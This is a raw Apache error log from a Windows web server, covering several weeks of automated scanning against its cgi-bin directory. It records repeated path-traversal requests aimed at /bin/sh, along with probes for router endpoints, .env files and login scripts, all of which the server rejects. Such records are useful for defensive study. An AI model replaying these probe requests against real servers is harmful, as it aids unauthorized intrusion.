[Wed May 14 18:15:01.275886 2025] [core:error] [pid 4776:tid 1128] [client 34.34.185.61:32912] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed May 14 23:37:21.860384 2025] [cgi:error] [pid 4776:tid 1128] [client 141.98.11.27:49462] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 15 02:46:14.720997 2025] [cgi:error] [pid 4776:tid 1128] [client 66.132.153.51:58366] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu May 15 13:56:09.044649 2025] [cgi:error] [pid 4776:tid 1088] [client 141.98.11.137:33882] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 15 20:41:01.277658 2025] [core:error] [pid 4776:tid 1140] [client 125.17.108.32:33830] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Fri May 16 01:21:33.413110 2025] [cgi:error] [pid 4776:tid 1120] [client 66.132.153.62:35278] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 16 05:45:49.225429 2025] [cgi:error] [pid 4776:tid 1140] [client 167.94.145.102:49120] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 16 12:00:07.157246 2025] [cgi:error] [pid 4776:tid 1140] [client 37.187.139.239:48648] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/.env
[Fri May 16 12:00:07.236263 2025] [cgi:error] [pid 4776:tid 1140] [client 37.187.139.239:48648] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri May 16 13:04:01.075629 2025] [cgi:error] [pid 4776:tid 1124] [client 152.32.252.94:33092] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri May 16 16:17:16.277030 2025] [cgi:error] [pid 4776:tid 1080] [client 170.106.161.78:50164] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri May 16 20:57:22.317896 2025] [cgi:error] [pid 4776:tid 1080] [client 206.168.34.56:55664] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 17 06:04:55.757582 2025] [cgi:error] [pid 4776:tid 1080] [client 89.42.231.140:33210] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 17 06:05:47.376301 2025] [cgi:error] [pid 4776:tid 1092] [client 3.248.77.100:49624] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 17 06:28:02.464658 2025] [cgi:error] [pid 4776:tid 1080] [client 89.42.231.140:45482] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 17 08:13:16.652492 2025] [cgi:error] [pid 4776:tid 1080] [client 89.42.231.140:48638] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 17 15:56:03.101763 2025] [cgi:error] [pid 4776:tid 1104] [client 139.162.142.167:38640] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/info.cgi
[Sat May 17 15:56:07.674872 2025] [cgi:error] [pid 4776:tid 1104] [client 139.162.142.167:41468] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/param.cgi
[Sat May 17 17:28:11.287553 2025] [cgi:error] [pid 4776:tid 1068] [client 141.98.11.137:33714] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 17 20:35:45.343596 2025] [cgi:error] [pid 4776:tid 1068] [client 15.222.77.46:56426] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 17 21:35:42.133000 2025] [cgi:error] [pid 4776:tid 1068] [client 43.153.7.191:40848] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun May 18 00:04:52.897198 2025] [cgi:error] [pid 4776:tid 1068] [client 66.132.153.59:58542] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun May 18 08:55:49.311730 2025] [core:error] [pid 4776:tid 1068] [client 185.93.69.163:47290] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun May 18 09:23:50.730757 2025] [core:error] [pid 4776:tid 1068] (20024)The given path is misformatted or contained invalid characters: [client 43.135.142.7:35014] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Sun May 18 16:16:35.472734 2025] [core:error] [pid 4776:tid 1112] [client 219.132.37.52:48988] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun May 18 18:07:27.871591 2025] [cgi:error] [pid 4776:tid 1112] [client 167.94.145.111:37202] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun May 18 19:11:35.246580 2025] [cgi:error] [pid 4776:tid 1112] [client 141.98.11.27:50070] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 19 10:31:34.609647 2025] [cgi:error] [pid 4776:tid 1120] [client 34.77.36.4:42202] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon May 19 11:50:41.238584 2025] [cgi:error] [pid 4776:tid 1112] [client 141.98.11.27:58564] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 19 12:42:19.836616 2025] [core:error] [pid 4776:tid 1120] [client 89.42.199.63:36212] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon May 19 17:25:18.003898 2025] [cgi:error] [pid 4776:tid 1120] [client 141.98.11.128:40908] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 19 19:38:57.498186 2025] [cgi:error] [pid 4776:tid 1120] [client 66.132.153.48:58586] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 20 01:51:23.010340 2025] [cgi:error] [pid 4776:tid 1120] [client 141.98.11.27:34426] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 20 08:22:33.115839 2025] [cgi:error] [pid 4776:tid 1068] [client 167.172.99.113:1852] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Tue May 20 09:58:00.806377 2025] [cgi:error] [pid 4776:tid 1108] [client 141.98.11.137:33338] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 20 12:50:09.879696 2025] [cgi:error] [pid 4776:tid 1104] [client 141.98.11.128:33662] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 20 16:09:04.416975 2025] [cgi:error] [pid 4776:tid 1108] [client 141.98.11.27:46462] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue May 20 20:57:47.860637 2025] [cgi:error] [pid 4776:tid 1108] [client 43.157.153.236:51866] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed May 21 03:20:29.515503 2025] [cgi:error] [pid 4776:tid 1120] [client 141.98.11.128:42394] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed May 21 05:25:40.224911 2025] [core:error] [pid 4776:tid 1120] [client 157.180.84.17:55614] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed May 21 06:52:39.952884 2025] [cgi:error] [pid 4776:tid 1120] [client 141.98.11.27:52604] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed May 21 09:14:26.242170 2025] [cgi:error] [pid 4776:tid 1104] [client 167.94.138.122:44902] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed May 21 11:39:51.029148 2025] [cgi:error] [pid 4776:tid 1104] [client 199.45.155.98:41370] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed May 21 14:06:14.930853 2025] [cgi:error] [pid 4776:tid 1120] [client 167.94.145.109:35608] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed May 21 19:50:17.901388 2025] [cgi:error] [pid 4776:tid 1112] [client 141.98.11.27:35992] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed May 21 22:12:42.684201 2025] [cgi:error] [pid 4776:tid 1112] [client 66.132.153.51:37970] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu May 22 00:32:09.464806 2025] [cgi:error] [pid 4776:tid 1112] [client 141.98.11.27:43572] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 22 03:50:36.705922 2025] [cgi:error] [pid 4776:tid 1112] [client 141.98.11.27:60560] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 22 13:31:11.484920 2025] [cgi:error] [pid 4776:tid 1108] [client 89.42.231.140:58988] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 22 14:01:43.241749 2025] [cgi:error] [pid 4776:tid 1108] [client 89.42.231.140:35230] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 22 16:22:00.310789 2025] [cgi:error] [pid 4776:tid 1104] [client 141.98.11.27:43478] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 22 21:56:09.476558 2025] [cgi:error] [pid 4776:tid 1072] [client 46.101.160.89:22202] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Thu May 22 22:41:44.745459 2025] [cgi:error] [pid 4776:tid 1088] [client 43.157.179.227:53148] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri May 23 00:11:16.767662 2025] [cgi:error] [pid 4776:tid 1088] [client 45.156.128.41:35117] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Fri May 23 02:08:58.160343 2025] [cgi:error] [pid 4776:tid 1088] [client 66.132.153.52:52710] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 23 10:57:44.767743 2025] [cgi:error] [pid 4776:tid 1076] [client 43.157.170.126:42856] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri May 23 11:03:07.914291 2025] [cgi:error] [pid 4776:tid 1076] [client 141.98.11.27:58806] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Fri May 23 13:01:58.377289 2025] [cgi:error] [pid 4776:tid 1076] [client 167.94.145.100:35142] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 24 01:32:44.393210 2025] [core:error] [pid 4776:tid 1112] (20024)The given path is misformatted or contained invalid characters: [client 43.156.204.134:38386] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Sat May 24 06:05:06.525210 2025] [cgi:error] [pid 4776:tid 1112] [client 206.168.34.116:59106] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 24 06:07:14.887698 2025] [cgi:error] [pid 4776:tid 1076] [client 34.250.12.251:55708] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 24 17:53:28.927652 2025] [cgi:error] [pid 4776:tid 1096] [client 167.94.138.164:37244] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun May 25 00:55:51.384347 2025] [cgi:error] [pid 4776:tid 1076] [client 66.132.153.50:39938] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun May 25 01:48:16.667381 2025] [core:error] [pid 4776:tid 1096] [client 88.147.147.107:51836] AH00135: Invalid method in request KUBE / HTTP/1.1
[Sun May 25 11:56:32.452799 2025] [cgi:error] [pid 4776:tid 1096] [client 167.94.146.51:60428] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun May 25 18:40:33.410211 2025] [cgi:error] [pid 4776:tid 1076] [client 89.42.231.140:37222] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 25 18:58:34.768820 2025] [cgi:error] [pid 4776:tid 1076] [client 89.42.231.140:60448] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun May 25 19:03:55.336051 2025] [core:error] [pid 4776:tid 1076] [client 193.122.3.220:52838] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun May 25 19:30:20.920847 2025] [cgi:error] [pid 4776:tid 1076] [client 89.42.231.140:60330] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon May 26 07:18:05.632863 2025] [cgi:error] [pid 4776:tid 1096] [client 206.168.34.39:54016] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 26 07:23:48.202450 2025] [cgi:error] [pid 4776:tid 1096] [client 66.132.153.63:59718] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon May 26 19:55:48.129401 2025] [cgi:error] [pid 4776:tid 1116] [client 123.58.196.49:43852] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon May 26 22:07:32.133016 2025] [cgi:error] [pid 4776:tid 1128] [client 66.132.153.58:46402] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 27 08:07:37.255205 2025] [mpm_winnt:notice] [pid 3272:tid 620] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Tue May 27 08:07:39.301502 2025] [mpm_winnt:notice] [pid 4776:tid 852] AH00364: Child: All worker threads have exited.
[Tue May 27 08:09:06.207189 2025] [core:warn] [pid 3516:tid 656] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Tue May 27 08:09:06.218159 2025] [mpm_winnt:notice] [pid 3516:tid 656] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Tue May 27 08:09:06.218159 2025] [mpm_winnt:notice] [pid 3516:tid 656] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Tue May 27 08:09:06.218159 2025] [core:notice] [pid 3516:tid 656] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue May 27 08:09:06.219157 2025] [mpm_winnt:notice] [pid 3516:tid 656] AH00418: Parent: Created child process 5024
[Tue May 27 08:09:06.720816 2025] [mpm_winnt:notice] [pid 5024:tid 676] AH00354: Child: Starting 64 worker threads.
[Tue May 27 14:02:51.391689 2025] [cgi:error] [pid 5024:tid 1124] [client 167.94.146.52:54926] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue May 27 23:52:02.116046 2025] [cgi:error] [pid 5024:tid 1112] [client 89.42.231.140:39128] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed May 28 05:18:01.764722 2025] [cgi:error] [pid 5024:tid 1112] [client 170.106.82.209:52034] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed May 28 08:06:11.960653 2025] [mpm_winnt:notice] [pid 3516:tid 656] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Wed May 28 08:06:13.991530 2025] [mpm_winnt:notice] [pid 5024:tid 676] AH00364: Child: All worker threads have exited.
[Wed May 28 08:07:33.951085 2025] [core:warn] [pid 3412:tid 672] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Wed May 28 08:07:34.018903 2025] [mpm_winnt:notice] [pid 3412:tid 672] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Wed May 28 08:07:34.018903 2025] [mpm_winnt:notice] [pid 3412:tid 672] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Wed May 28 08:07:34.018903 2025] [core:notice] [pid 3412:tid 672] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Wed May 28 08:07:34.019900 2025] [mpm_winnt:notice] [pid 3412:tid 672] AH00418: Parent: Created child process 5452
[Wed May 28 08:07:34.816486 2025] [mpm_winnt:notice] [pid 5452:tid 704] AH00354: Child: Starting 64 worker threads.
[Wed May 28 09:52:03.193671 2025] [cgi:error] [pid 5452:tid 1132] [client 170.106.163.48:40258] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed May 28 11:16:57.218472 2025] [cgi:error] [pid 5452:tid 1140] [client 143.110.137.123:2616] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed May 28 20:15:10.473413 2025] [cgi:error] [pid 5452:tid 1132] [client 206.168.34.55:49874] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed May 28 20:53:29.152080 2025] [cgi:error] [pid 5452:tid 1120] [client 134.122.90.130:51344] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed May 28 23:41:49.132329 2025] [cgi:error] [pid 5452:tid 1128] [client 66.132.153.56:52736] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu May 29 03:42:30.661122 2025] [core:error] [pid 5452:tid 1112] [client 106.13.78.99:55100] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu May 29 04:37:15.081727 2025] [cgi:error] [pid 5452:tid 1112] [client 212.132.115.107:37386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 04:37:15.170669 2025] [cgi:error] [pid 5452:tid 1112] [client 212.132.115.107:37386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_list
[Thu May 29 04:37:15.349171 2025] [cgi:error] [pid 5452:tid 1112] [client 212.132.115.107:37386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_list
[Thu May 29 04:37:15.436190 2025] [cgi:error] [pid 5452:tid 1112] [client 212.132.115.107:37386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 04:37:15.524182 2025] [cgi:error] [pid 5452:tid 1112] [client 212.132.115.107:37386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_list
[Thu May 29 04:37:15.714052 2025] [cgi:error] [pid 5452:tid 1112] [client 212.132.115.107:37386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_list
[Thu May 29 10:51:07.821094 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:48724] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 11:06:20.623969 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:44908] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 12:18:21.586870 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:56798] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 14:38:39.559998 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:42422] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 15:39:35.629941 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:54220] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 16:56:03.547258 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:44756] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 18:07:02.515896 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:57648] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 19:07:07.531192 2025] [cgi:error] [pid 5452:tid 1116] [client 89.42.231.140:42380] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu May 29 20:30:11.023691 2025] [core:error] [pid 5452:tid 1116] [client 101.36.121.4:10994] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Fri May 30 08:04:12.956475 2025] [cgi:error] [pid 5452:tid 1116] [client 206.168.34.77:42692] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 30 19:14:11.037224 2025] [cgi:error] [pid 5452:tid 1116] [client 66.132.153.49:52184] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri May 30 21:31:02.587831 2025] [cgi:error] [pid 5452:tid 1136] [client 167.94.138.204:41224] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 31 06:12:06.652561 2025] [cgi:error] [pid 5452:tid 1116] [client 52.16.60.102:34452] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat May 31 16:35:29.093091 2025] [cgi:error] [pid 5452:tid 1136] [client 167.94.145.100:52218] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 31 18:43:31.333388 2025] [cgi:error] [pid 5452:tid 1136] [client 167.94.145.101:40006] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 31 18:54:41.132018 2025] [cgi:error] [pid 5452:tid 1136] [client 199.45.155.106:38728] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat May 31 20:20:58.047263 2025] [cgi:error] [pid 5452:tid 1136] [client 89.42.231.140:60518] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 31 21:32:38.144473 2025] [cgi:error] [pid 5452:tid 1136] [client 89.42.231.140:52280] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sat May 31 23:12:56.489579 2025] [cgi:error] [pid 5452:tid 1124] [client 89.42.231.140:39386] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Jun 01 00:26:42.150951 2025] [cgi:error] [pid 5452:tid 1124] [client 89.42.231.140:33844] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Jun 01 01:51:16.332869 2025] [cgi:error] [pid 5452:tid 1124] [client 89.42.231.140:44350] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Jun 01 03:36:05.768596 2025] [cgi:error] [pid 5452:tid 1124] [client 89.42.231.140:47642] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Sun Jun 01 03:38:09.762930 2025] [cgi:error] [pid 5452:tid 1140] [client 139.162.142.167:43688] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/info.cgi
[Sun Jun 01 03:38:14.520660 2025] [cgi:error] [pid 5452:tid 1140] [client 139.162.142.167:46070] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/param.cgi
[Sun Jun 01 03:57:36.766092 2025] [cgi:error] [pid 5452:tid 1108] [client 152.32.176.68:55188] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Jun 01 04:15:46.738185 2025] [cgi:error] [pid 5452:tid 1100] [client 87.106.209.117:53219] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_send
[Sun Jun 01 04:15:46.815048 2025] [cgi:error] [pid 5452:tid 1100] [client 87.106.209.117:53219] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_send
[Sun Jun 01 04:15:46.887893 2025] [cgi:error] [pid 5452:tid 1100] [client 87.106.209.117:53219] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_send
[Sun Jun 01 04:15:46.961681 2025] [cgi:error] [pid 5452:tid 1100] [client 87.106.209.117:53219] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/sms_send
